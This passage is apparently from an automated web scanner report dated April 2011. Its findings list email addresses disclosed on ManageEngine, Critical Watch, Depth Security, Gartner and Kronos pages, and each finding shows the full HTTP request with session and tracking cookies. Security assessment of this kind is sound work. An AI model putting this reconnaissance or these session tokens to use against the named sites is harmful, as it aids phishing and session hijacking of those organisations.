Content-Length: 4246

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

25.14. http://tools.manageengine.com/forums/me/forum.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tools.manageengine.com
Path:   /forums/me/forum.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /forums/me/forum.php?limit=5&char=25 HTTP/1.1
Host: tools.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/meforum.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.13.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:14:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51202

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>body{}
.forumTitle{float:left;margin-top:-12px;padding-left:10px;font:11px Verdana, Arial, Helvetica, sans-serif;color:#000;line-height:22px;t
...[SNIP]...
<a href='mailto:opmanger-support@manageengine.com' target='_blank'>opmanger-support@manageengine.com<\/a>
...[SNIP]...
<a href='mailto:opmanager-support@manageengine.com' target='_blank'>opmanager-support@manageengine.com<\/a>
...[SNIP]...
<a href='mailto:nfs@manageengine.com' target='_blank'>nfs@manageengine.com<\/a>
...[SNIP]...

25.15. http://tools.manageengine.com/forums/security-manager/forum.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tools.manageengine.com
Path:   /forums/security-manager/forum.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /forums/security-manager/forum.php?limit=5&char=25 HTTP/1.1
Host: tools.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/security-manager-forum.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:11:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64425

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
body
{
}
.forumTitle{float:left; margin-top:-12px; padding-left:10px; font:11px Verdana, Arial, Helvetica, sans-serif;color:#000;line-height:
...[SNIP]...
<a href='mailto:Support@servicedeskplus.com' target='_blank'>Support@servicedeskplus.com<\/a>
...[SNIP]...
<a href='mailto:securitymanagerplus-support@manageengine.com' target='_blank'>securitymanagerplus-support@manageengine.com<\/a>
...[SNIP]...

25.16. http://www.criticalwatch.com/company/critical-watch-career.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /company/critical-watch-career.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /company/critical-watch-career.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/company/critical-watch-security.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:32 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 8730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<a href="mailto:employment@criticalwatch.com" class="content_menulink"><img src="../images/email.gif" width="40" height="38" align="absmiddle" />employment@criticalwatch.com</a>
...[SNIP]...

25.17. http://www.criticalwatch.com/company/critical-watch-contact.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /company/critical-watch-contact.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /company/critical-watch-contact.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/company/critical-watch-career.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:34 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 14936


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<a href="mailto:info@criticalwatch.com" class="content_menulink">info@criticalwatch.com</a>
...[SNIP]...

25.18. http://www.criticalwatch.com/products/vulnerability-management-ips.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /products/vulnerability-management-ips.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /products/vulnerability-management-ips.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/products/mssp.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:06 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 13783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<a href="mailto:tippingpoint@criticalwatch.com" class="color-gold">tippingpoint@criticalwatch.com</a>
...[SNIP]...

25.19. http://www.criticalwatch.com/support/critical-watch-support.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /support/critical-watch-support.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /support/critical-watch-support.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmb=164981229; __utmc=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 12:54:43 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 8976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<a href="mailto:support@criticalwatch.com" class="content_menulink">support@criticalwatch.com</a>
...[SNIP]...

25.20. http://www.depthsecurity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.depthsecurity.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET /?gclid=CKbh46DPt6gCFcQSNAodRgFuBQ HTTP/1.1
Host: www.depthsecurity.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303732840.1.1.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303732840.1; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6045
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 12:52:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Depth
...[SNIP]...
<a href="mailto:info@depthsecurity.com ">info@depthsecurity.com</a>
...[SNIP]...

25.21. http://www.depthsecurity.com/issa-kc-12-2009-presentation.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.depthsecurity.com
Path:   /issa-kc-12-2009-presentation.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /issa-kc-12-2009-presentation.aspx HTTP/1.1
Host: www.depthsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.depthsecurity.com/?gclid=CKbh46DPt6gCFcQSNAodRgFuBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.1.10.1303735972

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6488
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:10:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<html>
<head>
<tit
...[SNIP]...
<a href="mailto:info@depthsecurity.com ">info@depthsecurity.com</a>
...[SNIP]...

25.22. https://www.depthsecurity.com/company.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.depthsecurity.com
Path:   /company.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /company.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5736
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 15:13:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<html>
<head>
<tit
...[SNIP]...
<a href="mailto:info@depthsecurity.com ">info@depthsecurity.com</a>
...[SNIP]...

25.23. https://www.depthsecurity.com/contact-us.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.depthsecurity.com
Path:   /contact-us.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /contact-us.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: http://www.depthsecurity.com/issa-kc-12-2009-presentation.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11987
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:10:51 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
</h3>
info@depthsecurity.com
</div>
...[SNIP]...
<a href="mailto:info@depthsecurity.com ">info@depthsecurity.com</a>
...[SNIP]...

25.24. https://www.depthsecurity.com/professional-services.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.depthsecurity.com
Path:   /professional-services.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /professional-services.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/services.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6397
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 15:13:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<html>
<head>
<tit
...[SNIP]...
<a href="mailto:info@depthsecurity.com ">info@depthsecurity.com</a>
...[SNIP]...

25.25. https://www.depthsecurity.com/services.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.depthsecurity.com
Path:   /services.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /services.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/company.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6794
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 15:13:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<html>
<head>
<tit
...[SNIP]...
<a href="mailto:info@depthsecurity.com ">info@depthsecurity.com</a>
...[SNIP]...

25.26. http://www.gartner.com/technology/contact/become-a-client.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /technology/contact/become-a-client.jsp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /technology/contact/become-a-client.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/contact/contact_gartner.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; MKTSESSIONID=2pxxN1kBM49w9XHgl67B0BKnWmRD24ZpTvjK6St3Ncw4TQzX7by2!-1018522061; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733487556:ss=1303732853510; UnicaID=EaMj78Ff3mr-W7FK0tG; __utmz=256913437.1303733488.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=256913437.2022865609.1303733488.1303733488.1303733488.1; __utmc=256913437; __utmb=256913437.1.10.1303733488

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: Servlet/2.4 JSP/2.0
Content-type: text/html; charset=ISO-8859-1
Date: Mon, 25 Apr 2011 12:11:27 GMT
ETag: "pvbd35e8d8926582dc26975fcff5279ead"
X-PvInfo: [S10202.C10821.A151087.RA0.G24F28.U277869E6].[OT/html.OG/pages]
Vary: Accept-Encoding
Content-Length: 32000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>


<head>

<title>Become a Client</title>


...[SNIP]...
<input type="hidden" name="recipient" value="sales.lead@gartner.com "><!--sales.lead@gartner.com -->
...[SNIP]...

25.27. http://www.gartner.com/technology/contact/contact_gartner.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /technology/contact/contact_gartner.jsp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /technology/contact/contact_gartner.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/DisplayDocument?doc_cd=127481
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733464197:ss=1303732853510

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: MKTSESSIONID=nMx8N1kBgpd2v7XKWLb9qTL1ySyvfknTRk77TT2XbtpNyfyvrwqk!-1168810344; domain=.gartner.com; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-type: text/html; charset=ISO-8859-1
Date: Mon, 25 Apr 2011 12:11:14 GMT
ETag: "pv99785f693982e6484f97f558a3076f92"
Cache-Control: no-cache="set-cookie"
X-PvInfo: [S10202.C10821.A151087.RA0.G24F28.U2C9A436D].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; Path=/
Content-Length: 16560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>


<head>


<!-- Changes to title and meta tags
...[SNIP]...
<a href="mailto:inquiry@gartner.com">inquiry@gartner.com</a>
...[SNIP]...
<a href="mailto:help@gartner.com">help@gartner.com</a>
...[SNIP]...
<a href="mailto:investor.relations@gartner.com">investor.relations@gartner.com</a>
...[SNIP]...
<a href="mailto:info@amstock.com">info@amstock.com</a>
...[SNIP]...
<a href="mailto:ombudsman@gartner.com">ombudsman@gartner.com</a>
...[SNIP]...
<a href="mailto:vendor.briefings@gartner.com">
...[SNIP]...
<a href="mailto:jp.vendorbriefings@gartner.com">
...[SNIP]...
<a href="mailto:privacy.officer@gartner.com">privacy.officer@gartner.com</a>
...[SNIP]...
<a href="mailto:emea.privacyofficer@gartner.com">emea.privacyofficer@gartner.com</a>
...[SNIP]...
<a href="mailto:apac_privacy.officer@gartner.com">apac_privacy.officer@gartner.com</a>
...[SNIP]...

25.28. http://www.kronos.com/kronos-site-usage-privacy-policy.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kronos.com
Path:   /kronos-site-usage-privacy-policy.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /kronos-site-usage-privacy-policy.aspx HTTP/1.1
Host: www.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.kronos.com&SiteLanguage=1033; EktGUID=09aa79d0-673f-4609-b21e-7d9f4c9303d4; EkAnalytics=newuser; KRONOS_PUBLIC_US=oLbiTnpP6Si6kOk_DB7jFLNPiaC_Ce4w_I3BqCTnnw8TKWxdHCNaWZCIwvL0jHFbx-CJ_B7N8OAFc2s2P32q9I3r8vBB6mRCf7d9OEqeKNcwx6_MGW_2YzYMKIayfawPjXY5248iYocxSIZ_gu-1z8fF49vaXn80g8D6fyxIiYbbHFSz0; ASP.NET_SessionId=zoqftdbukjhn1b55hrsfjqnv; s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcspersistslider1=6; mbox=session#1303738433760-48782#1303740624|check#true#1303738824; s_cc=true; s_nr=1303738765059; s_invisit=true; s_lv=1303738765060; s_lv_s=First%20Visit; s_gpv_page=kronos%3Acustomer-support-login.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.3.10.1303738437

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:51:36 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 59619


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_ctl00_html1" xmlns="http://www.w3.org/1999/xhtml" lang="e
...[SNIP]...
<a href="mailto:webmaster@kronos.com">webmaster@kronos.com</a>
...[SNIP]...

25.29. http://www.manageengine.com/me_partners.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manageengine.com
Path:   /me_partners.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /me_partners.html HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
